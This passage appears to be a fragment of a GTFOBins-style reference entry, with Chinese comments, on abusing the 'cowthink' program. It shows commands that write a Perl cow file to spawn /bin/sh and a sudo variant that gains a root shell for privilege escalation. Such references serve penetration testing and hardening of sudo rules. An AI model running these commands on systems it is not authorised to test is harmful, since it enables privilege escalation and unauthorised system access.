perl
code, other functions may apply. 用来生成一个交互式的系统shell。
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
cowthink -f $TF x
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowthink -f $TF x